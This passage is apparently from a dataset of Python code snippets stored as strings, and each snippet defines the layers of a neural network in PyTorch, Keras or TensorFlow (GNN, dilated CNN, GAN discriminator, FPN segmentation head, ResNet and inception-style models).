dim_label_raw\n self.dim_label_in = dim_label_smooth\n self.dim_feat_in = dim_feat_smooth\n self.dim_hidden = arch_gnn['dim']\n # build the model below\n dim, act = arch_gnn['dim'], arch_gnn['act']\n self.aug_layers, self.conv_layers, self.res_pool_layers = [], [], []\n for i in range(num_ensemble):\n # feat aug\n if len(self.type_feature_augment) > 0:\n self.aug_layers.append(nn.ModuleList(\n nn.Linear(_dim, self.dim_feat_in) for _, _dim in self.type_feature_augment\n ))\n # graph convs\n convs = []\n if i == 0 or not self.branch_sharing:\n for j in range(arch_gnn['num_layers']):\n cls_gconv = DeepGNN.NAME2CLS[arch_gnn['aggr']]\n dim_in = (self.dim_feat_in + self.dim_label_in) if j == 0 else dim\n convs.append(cls_gconv(dim_in, dim, dropout=self.dropout, act=act, mulhead=self.mulhead))\n self.conv_layers.append(nn.Sequential(*convs))\n else: # i > 0 and branch_sharing\n self.conv_layers.append(self.conv_layers[-1])\n # skip-pooling layer\n type_res = arch_gnn['residue'].lower()\n type_pool = arch_gnn['pooling'].split('-')[0].lower()\n cls_res_pool = layers.ResPool\n args_pool = {}\n if type_pool == 'sort':\n args_pool['k'] = int(arch_gnn['pooling'].split('-')[1])\n self.res_pool_layers.append(\n cls_res_pool(dim, dim, arch_gnn['num_layers'], type_res, type_pool,\n dropout=self.dropout, act=act, args_pool=args_pool\n ))\n if len(self.aug_layers) > 0:\n self.aug_layers = nn.ModuleList(self.aug_layers)\n self.conv_layers = nn.ModuleList(self.conv_layers)\n self.res_pool_layers = nn.ModuleList(self.res_pool_layers)\n # ------- ensembler + classifier -------\n if num_ensemble == 1:\n self.ensembler = layers.EnsembleDummy()\n else:\n self.ensembler = layers.EnsembleAggregator(dim, dim, num_ensemble, dropout=self.dropout, \n type_dropout=train_params[\"ensemble_dropout\"], act=arch_gnn[\"ensemble_act\"])\n self.classifier = DeepGNN.NAME2CLS['mlp'](dim, self.num_classes, act='I', dropout=0.)\n # ---- optimizer, etc. ----\n self.lr = train_params[\"lr\"]\n self.sigmoid_loss = arch_gnn[\"loss\"] == \"sigmoid\"\n self.loss, self.opt_op = 0, None\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n\n self.num_ensemble = num_ensemble", "def __init__(self, Nchannels, Nsamples, output_units):\n super(conv2DNet_1, self).__init__()\n # Layer 1\n l1_channels = 16 \n self.conv1 = nn.Conv2d(1, l1_channels, (Nchannels, 1), padding = 0)\n self.batchnorm1 = nn.BatchNorm2d(l1_channels, False) # final size bsize x 1 x l1_channels x Nsamples\n\n # Layer 2\n l2_channels = 4\n l2_temp_window = 32\n l2_l1channel_overlap = 2\n self.padding1 = nn.ZeroPad2d((l2_temp_window // 2, l2_temp_window // 2 - 1, l2_l1channel_overlap//2-1, l2_l1channel_overlap//2)) # left, right, top, bottom\n self.conv2 = nn.Conv2d(1, l2_channels, (l2_l1channel_overlap, l2_temp_window)) # does not change size if combined with above padding\n self.batchnorm2 = nn.BatchNorm2d(l2_channels, False)\n self.pooling2 = nn.MaxPool2d((2, 4)) # final size bsize x l2_channels x floor(l1_channels/2) x floor(Nsamples/4)\n\n # Layer 3\n l3_channels = 4\n l3_temp_window = 4\n l3_l2channel_overlap = 8\n self.padding2 = nn.ZeroPad2d((l3_temp_window//2, l3_temp_window//2-1, l3_l2channel_overlap//2, l3_l2channel_overlap//2-1))\n self.conv3 = nn.Conv2d(l2_channels, l3_channels, (l3_l2channel_overlap, l3_temp_window))\n self.batchnorm3 = nn.BatchNorm2d(l3_channels, False)\n self.pooling3 = nn.MaxPool2d((2, 4)) # final size bsize x l3_channels x floor(l1_channels/4) x floor(Nsamples/16)\n\n # FC Layer\n fc_inputs = l3_channels * (l1_channels//4) * (Nsamples//16)\n self.fc1 = nn.Linear(fc_inputs, output_units)", "def __init__(self, num_1d=None):\n super(Net, self).__init__()\n\n self.lconv1 = nn.Sequential(\n nn.Conv1d(4, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n )\n\n self.conv1 = nn.Sequential(\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n )\n\n self.lconv2 = nn.Sequential(\n nn.MaxPool1d(kernel_size=4, stride=4),\n nn.Conv1d(64, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.ReLU(inplace=True),\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.ReLU(inplace=True),\n )\n\n self.lconv3 = nn.Sequential(\n nn.MaxPool1d(kernel_size=4, stride=4),\n nn.Conv1d(96, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv3 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv4 = nn.Sequential(\n nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv4 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv5 = nn.Sequential(\n nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv5 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv6 = nn.Sequential(\n nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv6 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv7 = nn.Sequential(\n nn.MaxPool1d(kernel_size=2, stride=2),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv7 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconvtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Dropout(p=0.1),\n nn.Conv2d(128, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n ]\n )\n\n self.convtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ]\n )\n self.final = nn.Sequential(\n nn.Conv2d(64, 5, kernel_size=(1, 1), padding=0),\n nn.BatchNorm2d(5),\n nn.ReLU(inplace=True),\n nn.Conv2d(5, 1, kernel_size=(1, 1), padding=0),\n )\n if num_1d is not None:\n self.final_1d = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=1, padding=0),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, num_1d, kernel_size=1, padding=0),\n nn.Sigmoid(),\n )\n self.num_1d = num_1d", "def __init__(self, config):\n super(NLayerDiscriminator, self).__init__()\n input_nc = config[\"in_channels\"]\n ndf = config[\"ndf\"]\n n_layers = config[\"n_layers\"]\n use_actnorm = config[\"use_actnorm\"]\n use_spectral = config[\"spectral_norm\"]\n if not use_actnorm:\n norm_layer = nn.BatchNorm2d\n else:\n norm_layer = ActNorm\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n\n if use_spectral:\n for i, lay in enumerate(sequence):\n if isinstance(lay, nn.Conv2d):\n sequence[i] = spectral_norm(lay)\n\n self.main = nn.Sequential(*sequence)\n\n weights_init(self.main)", "def __init__(self, slug, num_classes=2, num_filters=128,\n num_filters_fpn=256, upconv=False, pretrained=True, bifpn=False):\n\n super().__init__()\n\n # Feature Pyramid Network (FPN) with four feature maps of resolutions\n # 1/4, 1/8, 1/16, 1/32 and `num_filters` filters for all feature maps.\n if \"eff\" in slug:\n self.fpn = EffFPN(slug=slug, num_filters=num_filters_fpn,\n pretrained=pretrained, bifpn=bifpn)\n else:\n self.fpn = FPN(slug=slug, num_filters=num_filters_fpn,\n pretrained=pretrained, bifpn=bifpn)\n # The segmentation heads on top of the FPN\n\n self.head1 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head2 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head3 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head4 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n\n self.hm = nn.Conv2d(4 * num_filters, 1, 3, padding=1)\n\n self.classes_embedding = nn.Sequential(\n nn.Conv2d(4 * num_filters, 4 * num_filters, 3, padding=1),\n nn.ReLU(inplace=True))\n\n self.classes = nn.Sequential(\n nn.Dropout(0.5),\n nn.Conv2d(4 * num_filters, num_classes, 1)\n )\n\n if upconv:\n self.up8 = nn.ConvTranspose2d(\n num_filters, num_filters, 8, stride=8)\n self.up4 = nn.ConvTranspose2d(\n num_filters, num_filters, 4, stride=4)\n self.up2 = nn.ConvTranspose2d(\n num_filters, num_filters, 2, stride=2)\n else:\n self.up8 = torch.nn.Upsample(scale_factor=8, mode='nearest')\n self.up4 = torch.nn.Upsample(scale_factor=4, mode='nearest')\n self.up2 = torch.nn.Upsample(scale_factor=2, mode='nearest')", "def gyf_net(\n inputs,\n backbone_layers,\n num_classes,\n option = 1,\n do_dropout = False,\n nd_weights=[ 0, 0, 0.01 , 0.01] ,\n wd_weights=[ 0, 0, 0.01, 0.01],\n name='gyf_net',\n FC_num_of_nuerons = 128\n):\n dropout_param = 0.5\n\n C3, C4, C5 = backbone_layers\n\n if option == 'reg_baseline_c5_dubreshko':\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(C5)\n FC_regression = keras.layers.Dense(1024, name='FC_regression', activation='relu',\n kernel_regularizer=keras.regularizers.l2(wd_weights[2]),\n activity_regularizer=keras.regularizers.l2(nd_weights[2]))(GlobalAvgPool_features)\n FC_regression2 = keras.layers.Dense(512, name='FC_regression2', activation='relu',\n kernel_regularizer=keras.regularizers.l2(wd_weights[3]),\n activity_regularizer=keras.regularizers.l2(nd_weights[3]))(FC_regression)\n\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_baseline_c5':\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(C5)\n FC_regression = keras.layers.Dense(1024, name='FC_regression', activation='relu')(GlobalAvgPool_features)\n if do_dropout:\n FC_regression = keras.layers.Dropout(dropout_param)(FC_regression)\n\n FC_regression2 = keras.layers.Dense(512, name='FC_regression2', activation='relu')(FC_regression)\n if do_dropout:\n FC_regression2 = keras.layers.Dropout(dropout_param)(FC_regression2)\n\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_fpn_p3':\n p3 = create_p3_feature(C3, C4, C5)\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(p3)\n FC_regression = keras.layers.Dense(128, name='FC_regression', activation='relu')(GlobalAvgPool_features)\n FC_regression2 = keras.layers.Dense(64, name='FC_regression2', activation='relu')(FC_regression)\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_fpn_p3_p7_avg':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel_single_out(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n if option== 'reg_fpn_p3_p7_min_sig' or option== 'reg_fpn_p3_p7_mle' or option== 'reg_fpn_p3_p7_min_sig_L1' or option=='reg_fpn_p3_p7_mle_L1':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n if option== 'reg_fpn_p3_p7_min_sig' or option== 'reg_fpn_p3_p7_mle' or option== 'reg_fpn_p3_p7_min_sig_L1' or option=='reg_fpn_p3_p7_mle_L1':\n # compute pyramid features as per https://arxiv.org/abs/1708.02002\n features = create_pyramid_features(C3, C4, C5)\n FC_submodel = submodel(do_dropout=do_dropout, dropout_param=dropout_param)\n outputs = [FC_submodel(GAF) for GAF in features]\n\n\n return keras.models.Model(inputs=inputs, outputs=outputs, name=name)", "def __init__(self, options):\r\n nn.Module.__init__(self)\r\n # Convolution and pooling layers of VGG-16.\r\n self.basemodel = torchvision.models.resnet18(pretrained=True)\r\n self.options = options\r\n\r\n #label\r\n self.label_primary = nn.Linear(options['primary_dim'], options['proj_dim'])\r\n self.label_dual = nn.Linear(options['dual_dim'], options['proj_dim'])\r\n\r\n #classifer/regressor\r\n self.fc_primary = nn.Linear(512 + options['proj_dim'], options['primary_dim'])\r\n self.fc_dual = nn.Linear(512 + options['proj_dim'], options['dual_dim'])\r\n\r\n\r\n if self.options['fc'] == True:\r\n # Freeze all previous layers.\r\n for param in self.basemodel.parameters():\r\n param.requires_grad = False\r\n # Initialize the fc layers.\r\n nn.init.kaiming_normal_(self.fc_primary.weight.data)\r\n if self.fc_primary.bias is not None:\r\n nn.init.constant_(self.fc_primary.bias.data, val=0)\r\n\r\n nn.init.kaiming_normal_(self.fc_dual.weight.data)\r\n if self.fc_dual.bias is not None:\r\n nn.init.constant_(self.fc_dual.bias.data, val=0)\r\n\r\n nn.init.kaiming_normal_(self.label_primary.weight.data)\r\n if self.label_primary.bias is not None:\r\n nn.init.constant_(self.label_primary.bias.data, val=0)\r\n\r\n nn.init.kaiming_normal_(self.label_dual.weight.data)\r\n if self.label_dual.bias is not None:\r\n nn.init.constant_(self.label_dual.bias.data, val=0)\r\n\r\n\r\n else:\r\n for param in self.basemodel.conv1.parameters():\r\n param.requires_grad = False\r\n for param in self.basemodel.bn1.parameters():\r\n param.requires_grad = False\r\n for param in self.basemodel.layer1.parameters():\r\n param.requires_grad = False\r\n #for param in self.basemodel.layer2.parameters():\r\n # param.requires_grad = False\r\n #for param in self.basemodel.layer3.parameters():\r\n # param.requires_grad = False\r", "def create(self):\n \n \"\"\" A solo prepressing reduction network in the head \"\"\"\n print(\"pre_reduction\")\n with tf.name_scope('pre_reduction'):\n conv1 = NW.conv(self.X, 7, 7, 64, 2, 2, name='conv1')\n pool1 = NW.max_pool(conv1, 3, 3, 2, 2, name='pool1')\n norm1 = NW.lrn(pool1, 2, 2e-05, 0.75, name='norm1')\n reduction2 = NW.conv(norm1, 1, 1, 64, 1, 1, name='reduction2')\n conv2 = NW.conv(reduction2, 3, 3, 192, 1, 1,name='conv2')\n norm2 = NW.lrn(conv2, 2, 2e-05, 0.75, name='norm2')\n pool2 = NW.max_pool(norm2, 3, 3, 2, 2, name='pool2')\n \n \"\"\" 1st inception layer group \"\"\"\n print(\"icp1\")\n with tf.name_scope('icp1'):\n # branch 0\n icp1_out0 = NW.conv(pool2, 1, 1, 64, 1, 1, name='icp1_out0')\n # branch 1\n icp1_reduction1 = NW.conv(pool2, 1, 1, 96, 1, 1, name='icp1_reduction1')\n icp1_out1 = NW.conv(icp1_reduction1, 3, 3, 128, 1, 1, name='icp1_out1')\n # branch 2\n icp1_reduction2 = NW.conv(pool2, 1, 1, 16, 1, 1, name='icp1_reduction2')\n icp1_out2 = NW.conv(icp1_reduction2, 5, 5, 32, 1, 1, name='icp1_out2')\n # branch 3\n icp1_pool = NW.max_pool(pool2, 3, 3, 1, 1, name='icp1_pool')\n icp1_out3 = NW.conv(icp1_pool, 1, 1, 32, 1, 1, name='icp1_out3')\n # concat\n icp2_in = NW.concat([icp1_out0,\n icp1_out1,\n icp1_out2,\n icp1_out3], 3, 'icp2_in')\n\n \"\"\" 2nd inception layer group \"\"\"\n print(\"icp2\")\n with tf.name_scope('icp2'):\n # branch 0\n icp2_out0 = NW.conv(icp2_in, 1, 1, 128, 1, 1, name='icp2_out0')\n # branch 1\n icp2_reduction1 = NW.conv(icp2_in, 1, 1, 128, 1, 1, name='icp2_reduction1')\n icp2_out1 = NW.conv(icp2_reduction1, 3, 3, 192, 1, 1, name='icp2_out1')\n # branch 2\n icp2_reduction2 = NW.conv(icp2_in, 1, 1, 32, 1, 1, name='icp2_reduction2')\n icp2_out2 = NW.conv(icp2_reduction2, 5, 5, 96, 1, 1, name='icp2_out2')\n # branch 3\n icp2_pool = NW.max_pool(icp2_in, 3, 3, 1, 1, name='icp2_pool')\n icp2_out3 = NW.conv(icp2_pool, 1, 1, 64, 1, 1, name='icp2_out3')\n # concat\n icp2_out = NW.concat([icp2_out0,\n icp2_out1,\n icp2_out2,\n icp2_out3], 3, 